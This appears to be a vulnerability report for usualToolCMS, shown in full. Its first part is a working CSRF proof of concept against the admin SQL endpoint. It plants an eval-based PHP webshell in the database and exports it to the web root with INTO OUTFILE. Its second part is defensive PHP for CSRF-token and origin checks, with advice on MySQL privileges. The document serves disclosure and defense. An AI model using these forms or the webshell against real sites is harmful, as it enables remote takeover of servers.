If you want to use the vulnerability, you need to have the MySQL operation rights
First, generate a CSRF PoC that inserts a row of data containing malicious PHP code into CMS_water:
```html
<html>
  <body>
    <script>history.pushState('', '', '/')</script>
    <form action="http://127.0.0.1/usualToolCMS/cmsadmin/a_sqlbackx.php?t=sql" method="POST">
      <input type="hidden" name="sqlcontent" value="INSERT INTO `cms_water`(`id`, `water`, `water_type`, `water_place`, `water_textcolor`, `water_textsize`, `water_text`, `water_png`) VALUES (2,2,'image',7,'#B5B5BB5',20,'<?php eval($_POST[c]); ?>','')" />
      <input type="hidden" name="submit" value="执行SQL语句" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>
```
Finally, export the malicious PHP code into the root directory of the website to generate a shell:
```html
<html>
  <body>
    <script>history.pushState('', '', '/')</script>
    <form action="http://127.0.0.1/usualToolCMS/cmsadmin/a_sqlbackx.php?t=sql" method="POST">
      <input type="hidden" name="sqlcontent" value="SELECT `id`, `water`, `water_type`, `water_place`, `water_textcolor`, `water_textsize`, `water_text`, `water_png` FROM `cms_water` WHERE 1 INTO OUTFILE '../../WWW/usualToolCMS/shell.php'" />
      <input type="hidden" name="submit" value="执行SQL语句" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>
```
shell: http://127.0.0.1/usualToolCMS/shell.php
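
Both forms above succeed because the endpoint accepts a POST that carries only `sqlcontent` and `submit`, values any outside page can supply. As an added example (not part of the original report and not usualToolCMS code), here is one way a PHP admin handler could reject such requests with a per-session token and a same-origin check; the function names and the `csrf_token` field are assumptions made for illustration.

```php
<?php
declare(strict_types=1);
// Hypothetical guard for an admin POST endpoint; not usualToolCMS code.

function csrf_token(array &$session): string
{
    // One random token per session, embedded as a hidden field in admin forms.
    if (empty($session['csrf_token'])) {
        $session['csrf_token'] = bin2hex(random_bytes(32));
    }
    return $session['csrf_token'];
}

function same_origin(array $server): bool
{
    // Browsers attach Origin to cross-site form POSTs; fall back to Referer.
    $source = $server['HTTP_ORIGIN'] ?? $server['HTTP_REFERER'] ?? '';
    $host = parse_url($source, PHP_URL_HOST);
    if (!is_string($host) || $host === '') {
        return false; // missing, "null" or malformed source: reject
    }
    $port = parse_url($source, PHP_URL_PORT);
    $authority = is_int($port) ? "$host:$port" : $host;
    return strcasecmp($authority, (string)($server['HTTP_HOST'] ?? '')) === 0;
}

function request_allowed(array $server, array $post, array $session): bool
{
    $expected = $session['csrf_token'] ?? '';
    $given = $post['csrf_token'] ?? null;
    return ($server['REQUEST_METHOD'] ?? '') === 'POST'
        && same_origin($server)
        && is_string($given) && $expected !== ''
        && hash_equals($expected, $given);
}

// Constructed sample requests (not captured traffic).
$session = [];
$token = csrf_token($session);
$forged = ['REQUEST_METHOD' => 'POST', 'HTTP_HOST' => '127.0.0.1',
           'HTTP_ORIGIN' => 'http://other-site.example'];
$legit = ['REQUEST_METHOD' => 'POST', 'HTTP_HOST' => '127.0.0.1',
          'HTTP_ORIGIN' => 'http://127.0.0.1'];
// The forged form carries only the fields an outside page can know.
var_dump(request_allowed($forged, ['sqlcontent' => '...'], $session));
// The admin's own form includes the session token.
var_dump(request_allowed($legit, ['sqlcontent' => '...', 'csrf_token' => $token], $session));
```

Independently of the token check, `SELECT ... INTO OUTFILE` requires the MySQL `FILE` privilege and is confined by `secure_file_priv`, so revoking `FILE` from the CMS database account removes the file-write step.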